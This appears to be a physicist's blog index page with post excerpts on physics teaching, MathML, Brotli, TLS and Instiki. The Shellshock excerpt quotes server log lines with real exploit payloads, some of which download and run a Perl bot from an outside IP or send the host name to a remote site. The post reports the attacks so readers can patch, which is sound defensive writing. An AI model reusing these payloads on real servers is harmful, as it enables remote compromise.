Skip to the Main Content

Note:These pages make extensive use of the latest XHTML and CSS Standards. They ought to look great in any standards-compliant modern browser. Unfortunately, they will probably look horrible in older browsers, like Netscape 4.x and IE 4.x. Moreover, many posts use MathML, which is, currently only supported in Mozilla. My best suggestion (and you will thank me when surfing an ever-increasing number of sites on the web which have been crafted to use the new standards) is to upgrade to the latest version of your browser. If that's not possible, consider moving to the Standards-compliant and open-source Mozilla browser.

February 28, 2019

Instiki 0.30.0 and tex2svg 1.0

Instiki is my wiki-cum-collaboration platform. It has a built-in WYSIWYG vector-graphics drawing program, which is great for making figures. Unfortunately:

  • An extra step is required, in order to convert the resulting SVG into PDF for inclusion in the LaTeX paper. And what you end up with is a directory full of little PDF files (one for each figure), which need to be managed.
  • Many of my colleagues would rather use Tikz, which has become the de-facto standard for including figures in LaTeX.

Obviously, I needed to include Tikz support in Instiki. But, up until now, I didn’t really see a good way to do that, given that I wanted something that is

  1. Portable
  2. Secure
Posted by distler at 2:21 PM | Permalink | Followups (2)

February 15, 2019

Brotli

I finally got around to enabling Brotli compression on Golem. Reading the manual, I came across the BrotliAlterETag directive:

Description: How the outgoing ETag header should be modified during compression
Syntax: BrotliAlterETag AddSuffix|NoChange|Remove

with the description:

AddSuffix
Append the compression method onto the end of the ETag, causing compressed and uncompressed representations to have unique ETags. In another dynamic compression module, mod_deflate, this has been the default since 2.4.0. This setting prevents serving “HTTP Not Modified (304)” responses to conditional requests for compressed content.
NoChange
Don’t change the ETag on a compressed response. In another dynamic compression module, mod_deflate, this has been the default prior to 2.4.0. This setting does not satisfy the HTTP/1.1 property that all representations of the same resource have unique ETags.
Remove
Remove the ETag header from compressed responses. This prevents some conditional requests from being possible, but avoids the shortcomings of the preceding options.

Sure enough, it turns out that ETags+compression have been completely broken in Apache 2.4.x. Two methods for saving bandwidth, and delivering pages faster, cancel each other out and chew up more bandwidth than if one or the other were disabled.

Posted by distler at 9:47 AM | Permalink | Post a Comment

December 27, 2018

Python urllib2 and TLS

I was thinking about dropping support for TLSv1.0 in this webserver. All the major browser vendors have announced that they are dropping it from their browsers. And you’d think that since TLSv1.2 has been around for a decade, even very old clients ought to be able to negotiate a TLSv1.2 connection.

But, when I checked, you can imagine my surprise that this webserver receives a ton of TLSv1 connections… including from the application that powers Planet Musings. Yikes!

The latter is built around the Universal Feed Parser which uses the standard Python urrlib2 to negotiate the connection. And therein lay the problem …

Posted by distler at 11:28 AM | Permalink | Post a Comment

February 24, 2017

Responsibility

Many years ago, when I was an assistant professor at Princeton, there was a cocktail party at Curt Callan’s house to mark the beginning of the semester. There, I found myself in the kitchen, chatting with Sacha Polyakov. I asked him what he was going to be teaching that semester, and he replied that he was very nervous because — for the first time in his life — he would be teaching an undergraduate course. After my initial surprise that he had gotten this far in life without ever having taught an undergraduate course, I asked which course it was. He said it was the advanced undergraduate Mechanics course (chaos, etc.) and we agreed that would be a fun subject to teach. We chatted some more, and then he said that, on reflection, he probably shouldn’t be quite so worried. After all, it wasn’t as if he was going to teach Quantum Field Theory, “That’s a subject I’d feel responsible for.”

This remark stuck with me, but it never seemed quite so poignant until this semester, when I find myself teaching the undergraduate particle physics course.

Posted by distler at 6:13 PM | Permalink | Followups (28)

December 4, 2016

MathML Update

For a while now, Frédéric Wang has been urging me to enable native MathML rendering for Safari. He and his colleagues have made many improvements to Webkit’s MathML support. But there were at least two show-stopper bugs that prevented me from flipping the switch.

Posted by distler at 2:56 PM | Permalink | Followups (1)

June 14, 2016

Coriolis

I really like the science fiction TV series The Expanse. In addition to a good plot and a convincing vision of human society two centuries hence, it depicts, as Phil Plait observes, a lot of good science in a matter-of-fact, almost off-hand fashion. But one scene (really, just a few dialogue-free seconds in a longer scene) has been bothering me. In it, Miller, the hard-boiled detective living on Ceres, pours himself a drink. And we see — as the whiskey slowly pours from the bottle into the glass — that the artificial gravity at the lower levels (where the poor people live) is significantly weaker than near the surface (where the rich live) and that there’s a significant Coriolis effect. Unfortunately, the effect depicted is 3 orders-of-magnitude too big.

Posted by distler at 4:40 PM | Permalink | Followups (2)

January 10, 2016

BMiSsed

There’s a general mantra that we all repeat to ourselves: gauge transformations are not symmetries; they are redundancies of our description. There is an exception, of course: gauge transformations that don’t go to the identity at infinity aren’t redundancies; they are actual symmetries.

Strominger, rather beautifully showed that BMS supertranslations (or, more precisely, a certain diagonal subgroup of BMS +\text{BMS}^+ (which act as supertranslations on +\mathcal{I}^+) and BMS \text{BMS}^- (which act as supertranslations on \mathcal{I}^-) are symmetries of the gravitational S-matrix. The corresponding conservation laws are equivalent to Weinberg’s Soft-Graviton Theorem. Similarly, in electromagnetism, the U(1)U(1) gauge transformations which don’t go to the identity on ±\mathcal{I}^\pm give rise to the Soft-Photon Theorem.

A while back, there was considerable brouhaha about Hawking’s claim that BMS symmetry had something to do with resolving the blackhole information paradox. Well, finally, a paper from Hawking, Perry and Strominger has arrived.

Cue further brouhaha

Posted by distler at 11:39 AM | Permalink | Followups (23)

June 19, 2015

Asymptotic Safety and the Gribov Ambiguity

Recently, an old post of mine about the Asymptotic Safety program for quantizing gravity received a flurry of new comments. Inadvertently, one of the pseudonymous commenters pointed out yet another problem with the program, which deserves a post all its own.

Before launching in, I should say that

  1. Everything I am about to say was known to Iz Singer in 1978. Though, as with the corresponding result for nonabelian gauge theory, the import seems to be largely unappreciated by physicists working on the subject.
  2. I would like to thank Valentin Zakharevich, a very bright young grad student in our Math Department for a discussion on this subject, which clarified things greatly for me.
Posted by distler at 3:11 AM | Permalink | Followups (9)

May 12, 2015

Action-Angle Variables

This semester, I taught the Graduate Mechanics course. As is often the case, teaching a subject leads you to rethink that you thought you understood, sometimes with surprising results.

The subject for today’s homily is Action-Angle variables.

Let (,ω)(\mathcal{M},\omega) be a 2n2n-dimensional symplectic manifold. Let us posit that \mathcal{M} had a foliation by nn-dimensional Lagrangian tori (a torus, TMT\subset M, is Lagrangian if ω| T=0\omega|_T =0). Removing a subset, SS\subset \mathcal{M}, of codimension codim(S)2codim(S)\geq 2, where the leaves are singular, we can assume that all of the leaves on =\S\mathcal{M}'=\mathcal{M}\backslash S are smooth tori of dimension nn.

The objective is to construct coordinates φ i,K i\varphi^i, K_i with the following properties.

  1. The φ i\varphi^i restrict to angular coordinates on the tori. In particular φ i\varphi^i shifts by 2π2\pi when you go around the corresponding cycle on TT.
  2. The K iK_i are globally-defined functions on \mathcal{M} which are constant on each torus.
  3. The symplectic form ω=dK idφ i\omega= d K_i\wedge d \varphi^i.

From 1, it’s clear that it’s more convenient to work with the 1-forms dφ id\varphi^i, which are single-valued (and closed, but not necessarily exact), rather than with the φ i\varphi^i themselves. In 2, it’s rather important that the K iK_i are really globally-defined. In particular, an integrable Hamiltonian is a function H(K)H(K). The K iK_i are the nn conserved quantities which make the Hamiltonian integrable.

Obviously, a given foliation is compatible with infinitely many “integrable Hamiltonians,” so the existence of a foliation is the more fundamental concept.

All of this is totally standard.

What never really occurred to me is that the standard construction of action-angle variables turns out to be very closely wedded to the particular case of a cotangent bundle, =T *M\mathcal{M}=T^*M.

As far as I can tell, action-angle variables don’t even exist for foliations of more general symplectic manifolds, \mathcal{M}.

Posted by distler at 11:49 AM | Permalink | Followups (24)

December 18, 2014

Smoke Signals, Morse Code or … ?

It seemed like a straightforward question. If you use Apple’s Contacts.app to store your contacts, you’ve surely noticed this behaviour: some of your contacts auto-magically sprout clickable links for Facetime video/audio chats, with no intervention on your part. I was curious enough to submit a query about it, via Apple’s Support Site:

Contacts.app seems to know whether each of my contacts has registered their email for FaceTime, even if I have NEVER tried to facetime with them (or call their cell-phone or …). How does it do this? Are all of the email addresses in my addressbook automatically uploaded to Apple’s servers? If so, how do I turn this off, as it seems to be a MASSIVE invasion of my privacy.

That was a month and a half ago (2014/11/02). Today, I received a response:

Posted by distler at 3:14 PM | Permalink | Followups (14)

October 25, 2014

Wikipedia

Wow! After a decade, Wikipedia finally rolls out MathML rendering. Currently, only available (as an optional preference) to registered users. Hopefully, in a few more years, they’ll make it the default.

Some implementation details are available at Frédéric’s blog.

Posted by distler at 1:19 AM | Permalink | Followups (4)

September 27, 2014

Shellshock and MacOSX

Most Linux Distros have released patches for the recently-discovered “Shellshock” bug in /bin/bash. Apple has not, despite the fact that it uses bash as the default system shell (/bin/sh).

If you are running a webserver, you are vulnerable. Even if you avoid the obvious pitfall of writing CGI scripts as shellscripts, you are still vulnerable if one of your Perl (or PHP) scripts calls out to system(). Even Phusion Passenger is vulnerable. And, yes, this vulnerability is being actively exploited on the Web.

internetsurvey-3.erratasec.com - - [24/Sep/2014:20:35:04 -0500] "GET / HTTP/1.0" 301 402 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-" - - -
hosted-by.snel.com - - [25/Sep/2014:02:50:59 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" "-" - - -
census1.shodan.io - - [25/Sep/2014:18:55:31 -0500] "GET / HTTP/1.1" 301 379 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69" "-" - - -
ec2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [25/Sep/2014:20:05:01 -0500] "GET / HTTP/1.1" 301 379 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php5 HTTP/1.0" 301 391 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php HTTP/1.0" 301 390 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 301 395 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /test HTTP/1.0" 301 383 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" -  -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php HTTP/1.0" 404 359 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php5 HTTP/1.0" 404 360 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 364 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /test HTTP/1.0" 404 352 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
ns2.rublevski.by - - [26/Sep/2014:14:39:29 -0500] "GET / HTTP/1.1" 301 385 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - -
ns2.rublevski.by - - [26/Sep/2014:14:39:30 -0500] "GET / HTTP/1.1" 200 155 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:21 -0500] "GET /category/2007/07/making_adscft_precise.html%0A HTTP/1.1" 301 431 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:23 -0500] "GET /category/2007/07/making_adscft_precise.html%0D%0A HTTP/1.1" 301 434 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:24 -0500] "GET /category/2007/07/making_adscft_precise.html%0d%0a HTTP/1.1" 404 393 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:33 -0500] "GET /category/2007/07/making_adscft_precise.html%0a HTTP/1.1" 404 392 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:11:41 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0A HTTP/1.1" 301 439 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:11:44 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0a HTTP/1.1" 404 400 "-" "() { :;}; echo -e 'detector'" "-" - - -

Some of these look like harmless probes; others (like the one which tries to download and run an IRCbot on your machine) less so.

If you’re not running a webserver, the danger is less clear. There are persistent (but apparently incorrect) rumours that Apple’s DHCP client may be vulnerable. If true, then your iPhone could easily be pwned by a rogue DHCP server (running on someone’s laptop) at Starbucks.

I don’t know what to do about your iPhone, but at least you can patch your MacOSX machine yourself.

Posted by distler at 12:58 PM | Permalink | Followups (2)

August 19, 2014

Golem V

For nearly 20 years, Golem has been the machine on my desk. It’s been my mail server, web server, file server, … ; it’s run Mathematica and TeX and compiled software for me. Of course, it hasn’t been the same physical machine all these years. Like Doctor Who, it’s gone through several reincarnations.

Alas, word came down from the Provost that all “servers” must move (physically or virtually) to the University Data Center. And, bewilderingly, the machine on my desk counted as a “server.”

Posted by distler at 3:05 PM | Permalink | Followups (15)

February 24, 2014

Questions

My eldest turned 18 and voted in her first Primary election this week. This being Texas, she decided to register as a Republican. Which means that, soon, we will start fielding phone calls from political campaigns. So I drafted a set of questions to ask the earnest campaign workers when they call.

Posted by distler at 9:30 PM | Permalink | Followups (9)

February 22, 2014

Lying

Sometimes, for the sake of pedagogy, it is best to suppress some of the ugly details, in order to give a clear exposition of the idea behind a particular concept one is trying to teach. But clarity isn’t achieved by outright lies. And I always find myself frustrated when our introductory courses descend to the latter.

My colleague, Sonia, is teaching the introductory “Waves” course (Phy 315) which, as you might imagine, is all about solving the equation

(1)0=( 2t 2c 2 2x 2)u(x,t)0 = \left(\frac{\partial^2}{{\partial t}^2} - c^2 \frac{\partial^2}{{\partial x}^2}\right) u(x,t)

This has travelling wave solutions, with dispersion relation

(2)ω(k) 2=c 2k 2{\omega(k)}^2 = c^2 k^2

If you study solutions to (1), on the interval [0,L][0,L], with “free” boundary conditions at the endpoints,

(3)ux| x=0,L=0\left.\frac{\partial u}{\partial x}\right\vert_{x=0,L} = 0

you find standing wave solutions u(x,t)=Acos(kx)cos(ckt) u(x,t) = A \cos(k x)\cos( c k t) where the boundary condition at x=Lx=L imposes

(4)sin(kL)=0orkL=nπ,n=1,2,\sin(k L) = 0\qquad \text{or}\qquad k L = n\pi,\, n=1,2,\dots

The first couple of these “normal modes” look like

(5) Layer 1 x = 0 x=0 x = L x=L Layer 1 x = 0 x=0 x = L x=L n=1 n=2\begin{matrix} \begin{svg} <svg width="240" height="102" xmlns="http://www.w3.org/2000/svg" xmlns:svg="http://www.w3.org/2000/svg" xmlns:se="http://svg-edit.googlecode.com" xmlns:math="http://www.w3.org/1998/Math/MathML"> <g> <title>Layer 1</title> <path id="svg_36902_1" d="m220,101c-100,0 -100,-100 -200,-100" stroke-width="2" stroke="#ff0000" fill="none"/> <line fill="none" stroke="#000000" stroke-width="2" x1="20" y1="51" x2="220" y2="51" id="svg_36902_2"/> <foreignObject height="20" width="40" font-size="16" id="svg_36902_3" y="51" x="0"> <math display="inline" xmlns="http://www.w3.org/1998/Math/MathML"> <semantics> <mrow> <mi>x</mi> <mo>=</mo> <mn>0</mn> </mrow> <annotation encoding="application/x-tex">x=0</annotation> </semantics> </math> </foreignObject> <foreignObject id="svg_36902_4" height="20" width="40" font-size="16" y="51" x="200"> <math display="inline" xmlns="http://www.w3.org/1998/Math/MathML"> <semantics> <mrow> <mi>x</mi> <mo>=</mo> <mi>L</mi> </mrow> <annotation encoding="application/x-tex">x=L</annotation> </semantics> </math> </foreignObject> </g> </svg> \end{svg} & \begin{svg} <svg width="240" height="102" xmlns="http://www.w3.org/2000/svg" xmlns:svg="http://www.w3.org/2000/svg" xmlns:se="http://svg-edit.googlecode.com" xmlns:math="http://www.w3.org/1998/Math/MathML"> <g> <title>Layer 1</title> <line fill="none" stroke="#000000" stroke-width="2" x1="20" y1="51" x2="220" y2="51" id="svg_36903_2"/> <foreignObject height="20" width="40" font-size="16" id="svg_36903_3" y="51" x="0"> <math display="inline" xmlns="http://www.w3.org/1998/Math/MathML"> <semantics> <mrow> <mi>x</mi> <mo>=</mo> <mn>0</mn> </mrow> <annotation encoding="application/x-tex">x=0</annotation> </semantics> </math> </foreignObject> <foreignObject id="svg_36903_4" height="20" width="40" font-size="16" y="51" x="200"> <math display="inline" xmlns="http://www.w3.org/1998/Math/MathML"> <semantics> <mrow> <mi>x</mi> <mo>=</mo> <mi>L</mi> </mrow> <annotation encoding="application/x-tex">x=L</annotation> </semantics> </math> </foreignObject> <path fill="none" stroke="#ff0000" stroke-width="2" d="m20,1c50,0 50,100 100,100c43,0 50,-100 100,-100" id="svg_36903_5" fill-opacity="0"/> </g> </svg> \end{svg}\ n=1&n=2 \end{matrix}

To “illustrate” this, in their compulsory lab accompanying the course, the students were given the task of measuring the normal modes of a thin metal bar, with free boundary conditions at each end, sinusoidally driven by an electromagnet (of adjustable frequency).

Unfortunately, this “illustration” is a complete lie. The transverse oscillations of the metal bar are governed by an equation which is not even approximately like (1); the dispersion relation looks nothing like (2); “free boundary conditions” look nothing like (3) and therefore it should not surprise you that the normal modes look nothing like (4).

Unfortunately, so inured are they to this sort of thing, that only one (out of 120!) students noticed that something was amiss in their experiment. “Hey,” he emailed Sonia, “Why is the n=1n=1 mode absent?”

Posted by distler at 3:55 PM | Permalink | Followups (1)